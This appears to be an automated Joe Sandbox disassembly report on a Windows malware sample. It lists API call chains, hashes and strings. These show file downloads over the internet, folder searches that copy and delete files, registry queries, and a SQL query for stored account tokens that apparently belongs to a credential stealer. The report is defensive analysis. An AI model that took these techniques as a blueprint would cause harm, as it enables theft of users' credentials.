                                      • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID: 0aA
                                      • API String ID: 167551676-2786531170
                                      • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                      • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                      • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                      • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,008806F8,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,008806F8,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                      • __aulldiv.LIBCMT ref: 00418172
                                      • __aulldiv.LIBCMT ref: 00418180
                                      • wsprintfA.USER32 ref: 004181AC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2886426298-3474575989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                      APIs
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A51
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A68
                                        • Part of subcall function 02304A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02304A7F
                                        • Part of subcall function 02304A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02304AA0
                                        • Part of subcall function 02304A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02304AB0
                                      • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 02306376
                                      • StrCmpCA.SHLWAPI(?,0064A480), ref: 023063AE
                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 023063F6
                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 0230641A
                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 02306443
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 02306471
                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 023064B0
                                      • InternetCloseHandle.WININET(?), ref: 023064BA
                                      • InternetCloseHandle.WININET(00000000), ref: 023064C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                      • String ID:
                                      • API String ID: 4287319946-0
                                      • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction ID: 870ce40497915d95b47b4b17439a9295cec277adb6f6848852ac0224a7cb83de
                                      • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                      • Instruction Fuzzy Hash: 855190B5A40218AFDB24DFA0DC95BEE7779EB04705F008098F605A71C4DBB4AB85CFA5
                                      APIs
                                      • memset.MSVCRT ref: 02314FEE
                                        • Part of subcall function 02319047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02319072
                                      • lstrcat.KERNEL32(?,00000000), ref: 02315017
                                      • lstrcat.KERNEL32(?,00421000), ref: 02315034
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314B93
                                        • Part of subcall function 02314B77: FindFirstFileA.KERNEL32(?,?), ref: 02314BAA
                                      • memset.MSVCRT ref: 0231507A
                                      • lstrcat.KERNEL32(?,00000000), ref: 023150A3
                                      • lstrcat.KERNEL32(?,00421020), ref: 023150C0
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02314BD8
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02314BEE
                                        • Part of subcall function 02314B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02314DE4
                                        • Part of subcall function 02314B77: FindClose.KERNEL32(000000FF), ref: 02314DF9
                                      • memset.MSVCRT ref: 02315106
                                      • lstrcat.KERNEL32(?,00000000), ref: 0231512F
                                      • lstrcat.KERNEL32(?,00421038), ref: 0231514C
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314C17
                                        • Part of subcall function 02314B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 02314C2C
                                        • Part of subcall function 02314B77: wsprintfA.USER32 ref: 02314C49
                                        • Part of subcall function 02314B77: PathMatchSpecA.SHLWAPI(?,?), ref: 02314C85
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,0064A524), ref: 02314CB1
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,00420FF8), ref: 02314CC3
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,?), ref: 02314CD7
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,00420FFC), ref: 02314CE9
                                        • Part of subcall function 02314B77: lstrcat.KERNEL32(?,?), ref: 02314CFD
                                        • Part of subcall function 02314B77: CopyFileA.KERNEL32(?,?,00000001), ref: 02314D13
                                        • Part of subcall function 02314B77: DeleteFileA.KERNEL32(?), ref: 02314D98
                                      • memset.MSVCRT ref: 02315192
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID:
                                      • API String ID: 4017274736-0
                                      • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction ID: 79cb80718ade37b54009954b3293d69fda20f5d1018b7a416ce18fcbfa328a44
                                      • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                      • Instruction Fuzzy Hash: 3641B779A4021467D728F7B0EC46FDD7739AF24701F404495B689660C0EEB957C8CFA2
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 02318397
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0231839E
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 023183BF
                                      • __aulldiv.LIBCMT ref: 023183D9
                                      • __aulldiv.LIBCMT ref: 023183E7
                                      • wsprintfA.USER32 ref: 02318413
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: @
                                      • API String ID: 2774356765-2766056989
                                      • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction ID: 982d79737f90e52f3a5430623590b4c0bf8e0eda6ede2b78c6c89212ce7e68c7
                                      • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                      • Instruction Fuzzy Hash: 90214AB1E44218ABEB14DFD4CC49FAEB7B9FB45B04F104609F605BB680D77869008BA9
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                        • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                      • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                      • API String ID: 1440504306-1079375795
                                      • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                      • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                      • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                                      • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess$DefaultLangUser
                                      • String ID: B
                                      • API String ID: 1494266314-2248957098
                                      • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                      • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                      • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                      APIs
                                      • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                        • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                      • memset.MSVCRT ref: 00409EE8
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                      • API String ID: 1977917189-1096346117
                                      • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                      • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                      • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                      • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                      APIs
                                        • Part of subcall function 02307537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 023075A1
                                        • Part of subcall function 02307537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02307618
                                        • Part of subcall function 02307537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02307674
                                        • Part of subcall function 02307537: GetProcessHeap.KERNEL32(00000000,?), ref: 023076B9
                                        • Part of subcall function 02307537: HeapFree.KERNEL32(00000000), ref: 023076C0
                                      • lstrcat.KERNEL32(0064A668,004217FC), ref: 0230786D
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 023078AF
                                      • lstrcat.KERNEL32(0064A668,00421800), ref: 023078C1
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 023078F6
                                      • lstrcat.KERNEL32(0064A668,00421804), ref: 02307907
                                      • lstrcat.KERNEL32(0064A668,00000000), ref: 0230793A
                                      • lstrcat.KERNEL32(0064A668,00421808), ref: 02307954
                                      • task.LIBCPMTD ref: 02307962
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                      • String ID:
                                      • API String ID: 2677904052-0
                                      • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction ID: ceec174346cd13f2f37a842cdfcc656188b0cc1c8721d05bd2726d1572a5ba41
                                      • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                      • Instruction Fuzzy Hash: 47310C79E40109EFDB14EBE0DCE5DFE777AEB49301B145118E106A7290DA34E946CF61
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                      • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                      • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                      • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                      • InternetCloseHandle.WININET(?), ref: 004050C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 3894370878-0
                                      • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                      • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                      • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                      • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02305231
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02305238
                                      • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 02305251
                                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 02305278
                                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 023052A8
                                      • memcpy.MSVCRT(00000000,?,00000001), ref: 023052F1
                                      • InternetCloseHandle.WININET(?), ref: 02305320
                                      • InternetCloseHandle.WININET(?), ref: 0230532D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                      • String ID:
                                      • API String ID: 1008454911-0
                                      • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction ID: 64d792a784aa2e78d27d82b74e48bcc33eaf3ce1476992ef2be6ff6741981899
                                      • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                      • Instruction Fuzzy Hash: 3031F9B4A40218ABDB20CF94DC85BDCB7B5FB48704F5081D9E609A7281D7746AC5CF59
                                      APIs
                                        • Part of subcall function 0231AA87: lstrlen.KERNEL32(0230516C,?,?,0230516C,00420DDE), ref: 0231AA92
                                        • Part of subcall function 0231AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0231AAEC
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                      • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 023158AB
                                      • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02315908
                                      • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02315ABE
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02315457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 0231548F
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02315527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 0231557F
                                        • Part of subcall function 02315527: lstrlen.KERNEL32(00000000), ref: 02315596
                                        • Part of subcall function 02315527: StrStrA.SHLWAPI(00000000,00000000), ref: 023155CB
                                        • Part of subcall function 02315527: lstrlen.KERNEL32(00000000), ref: 023155EA
                                        • Part of subcall function 02315527: strtok.MSVCRT(00000000,?), ref: 02315605
                                        • Part of subcall function 02315527: lstrlen.KERNEL32(00000000), ref: 02315615
                                      • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 023159F2
                                      • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02315BA7
                                      • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02315C73
                                      • Sleep.KERNEL32(0000EA60), ref: 02315C82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID:
                                      • API String ID: 3630751533-0
                                      • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction ID: 94e8876f5795999882418f17d9eb5ae9f3d749824c0322104e35ea8b95267a5f
                                      • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                      • Instruction Fuzzy Hash: 20E14E71911208ABCB2CFBA0DE95EEE777AAF55301F80816DE546660D0EF346B48CF91
                                      APIs
                                      • memset.MSVCRT ref: 0230158E
                                        • Part of subcall function 02301507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0230151B
                                        • Part of subcall function 02301507: RtlAllocateHeap.NTDLL(00000000), ref: 02301522
                                        • Part of subcall function 02301507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 0230153E
                                        • Part of subcall function 02301507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 0230155C
                                        • Part of subcall function 02301507: RegCloseKey.ADVAPI32(?), ref: 02301566
                                      • lstrcat.KERNEL32(?,00000000), ref: 023015B6
                                      • lstrlen.KERNEL32(?), ref: 023015C3
                                      • lstrcat.KERNEL32(?,004262E4), ref: 023015DE
                                        • Part of subcall function 0231A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0231A9EF
                                        • Part of subcall function 0231AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0231AC2C
                                        • Part of subcall function 0231AC17: lstrcpy.KERNEL32(00000000), ref: 0231AC6B
                                        • Part of subcall function 0231AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0231AC79
                                        • Part of subcall function 0231AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0231AB6C
                                        • Part of subcall function 02318DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02301660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 02318DED
                                        • Part of subcall function 0231AB87: lstrcpy.KERNEL32(00000000,?), ref: 0231ABD9
                                        • Part of subcall function 0231AB87: lstrcat.KERNEL32(00000000), ref: 0231ABE9
                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 023016CC
                                        • Part of subcall function 0231AA07: lstrcpy.KERNEL32(?,00000000), ref: 0231AA4D
                                        • Part of subcall function 02309C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02309C53
                                        • Part of subcall function 02309C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02309C78
                                        • Part of subcall function 02309C27: LocalAlloc.KERNEL32(00000040,?), ref: 02309C98
                                        • Part of subcall function 02309C27: ReadFile.KERNEL32(000000FF,?,00000000,023016F6,00000000), ref: 02309CC1
                                        • Part of subcall function 02309C27: LocalFree.KERNEL32(023016F6), ref: 02309CF7
                                        • Part of subcall function 02309C27: CloseHandle.KERNEL32(000000FF), ref: 02309D01
                                      • DeleteFileA.KERNEL32(00000000), ref: 02301756
                                      • memset.MSVCRT ref: 0230177D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1898221830.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2300000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                      • String ID:
                                      • API String ID: 3885987321-0
                                      • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                      • Instruction ID: 10adfcb3914243925d0933259fd9305ef396369980dc765320a48fbd28d90ccc
                                      • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                      • Instruction Fuzzy Hash: 23516FB1D402189BCB29FB60DD91FED777EAF54701F4041A8A64AA20C0EF306B89CF65
                                      APIs
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                      • wsprintfA.USER32 ref: 00418459
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      • RegQueryValueExA.ADVAPI32(00000000,00880CB0,00000000,000F003F,?,00000400), ref: 004184EC
                                      • lstrlenA.KERNEL32(?), ref: 00418501
                                      • RegQueryValueExA.ADVAPI32(00000000,00880D58,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                      • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1897818798.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1897818798.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1897818798.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_is65NMeWkV.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
